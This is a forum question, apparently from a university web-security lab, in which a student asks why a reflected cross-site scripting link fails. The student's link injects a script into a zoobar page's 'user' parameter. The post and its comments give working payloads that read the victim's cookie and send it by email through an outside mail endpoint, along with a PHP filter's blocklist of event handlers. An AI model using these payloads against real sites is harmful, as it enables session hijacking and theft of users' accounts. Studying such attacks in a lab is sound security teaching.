# Crafting a malicious link

Tags: javascript, php, cookies

My task in a school project is to craft a link that (assuming the victim is logged on to zoobar.org)upon the victim clicking on the link, steals their cookie and emails it to myself. I have crafted the following link:

```
masked.masked.masked.se/zoobar/users.php?user="</input><script>alert("XSS")</script>
```

This link successfully creates an alert box. So I basically have done enough to run any javascript with the link. Now, I want to insert something into my link that gives me the same functionality as this script:

```
javascript:void((new Image()).src='http://www.masked.masked.se/utbildning/uni/kurser/course/
masked/Labs/WebAttacks/sendmail.php?' + 'to=me@uni.se' +
'&payload='+document.cookie + '&random=' + Math.random());
```

I would like to just insert this script into my link, like this:

```
masked.masked.uni.se/zoobar/users.php?user="</input><script>javascript:void((new Image()).src='http://www.masked.uni.se/utbildning/uni/kurser/masked/masked/Labs/WebAttacks/sendmail.php?' + 'to=me@uni.se' + '&payload='+document.cookie + '&random=' + Math.random());</script>
```

But it doesn't send me an email! I assure you there is nothing wrong with the mail server or the javascript itself, as I have used the exact script to retrieve the cookie from another part of the zoobar website before. Why doesn't my link work?

EDIT:

Client-side code:
snippet of users.php:

```
<?php 
  $selecteduser = $_GET['user']; 
  $sql = "SELECT Profile, Username, Zoobars FROM Person " . 
         "WHERE Username='" . addslashes($selecteduser) . "'";
  $rs = $db->executeQuery($sql);
  if ( $rs->next() ) { // Sanitize and display profile
    list($profile, $username, $zoobars) = $rs->getCurrentValues();
    echo "<div class=profilecontainer><b>Profile</b>";
    $allowed_tags = 
      '<a><br><b><h1><h2><h3><h4><i><img><li><ol><p><strong><table>' .
      '<tr><td><th><u><ul><em><span>';
    $profile = strip_tags($profile, $allowed_tags);
    $disallowed = 
      'javascript:|window|eval|setTimeout|setInterval|target|'.
      'onAbort|onBlur|onChange|onClick|onDblClick|'.
      'onDragDrop|onError|onFocus|onKeyDown|onKeyPress|'.
      'onKeyUp|onLoad|onMouseDown|onMouseMove|onMouseOut|'.
      'onMouseOver|onMouseUp|onMove|onReset|onResize|'.
      'onSelect|onSubmit|onUnload';
    $profile = preg_replace("/$disallowed/i", " ", $profile);
    echo "<p id=profile>$profile</p></div>";
  } else if($selecteduser) {  // user parameter present but user not found
    echo '<p class="warning" id="baduser">Cannot find that user.</p>';
  }
```

Comment: get rid of the `javascript:void(` - it is in a `<script>` tag so you don't need to say it is javascript

Comment: I rewrote it to this: http://dasak.csc.kth.se/zoobar/users.php?user=%22%3C/input%3E%3Cscript%3Enew%20Image%28%29.src=%27http://www.csc.kth.se/utbildning/kth/kurser/DD2395/dasak13/Labs/WebAttacks/sendmail.php?%27%20+%20%27to=sahandz@kth.se%27%20+%20%27&payload=%27+document.cookie%20+%20%27&random=%27%20+%20Math.random%28%29;%3C/script%3E and it still doesn't work. I doubt that what you said is a problem as I've used that exact script inside of a <script> before and it has worked.

Comment: If you've determined the issue is in your server-side code, then I'd say your client-side code (which is all you've shared) is kind of irrelevant.

Comment: I have my doubts too. I tried the first link  - no success. if I create a HTML link <a href=""&hellip; it does not work either, and even produces a syntax error (quotes). And, finally, when I enter the "</input><script>&hellip;</script>" string in the "login_username" field of the web page "http://dasak.csc.kth.se/" (where it probably is meant to be entered), it does not work.

Comment: It's not meant to be entered there, hherger. Just create an account at http://dasak.csc.kth.se/zoobar/ and click on the user button and enter it in the field there. It works that way.

Comment: What part of the server-side code you've shared is supposed to send that email?

Comment: If you mean what part of the server-side code that handles the bad input I provide through the link, I have tried to remove everything except just that in my last edit. The code provided now should be the code that handles the input. What really confuses me is how the input does exactly what I want it to when inserted in the user field, and how I can get the desired result out of this link: `dasak.csc.kth.se/zoobar/users.php?user="</input><script>alert("hi")</script>` (an alert with the text "hi"), but as soon as I insert my email-script, it doesn't work.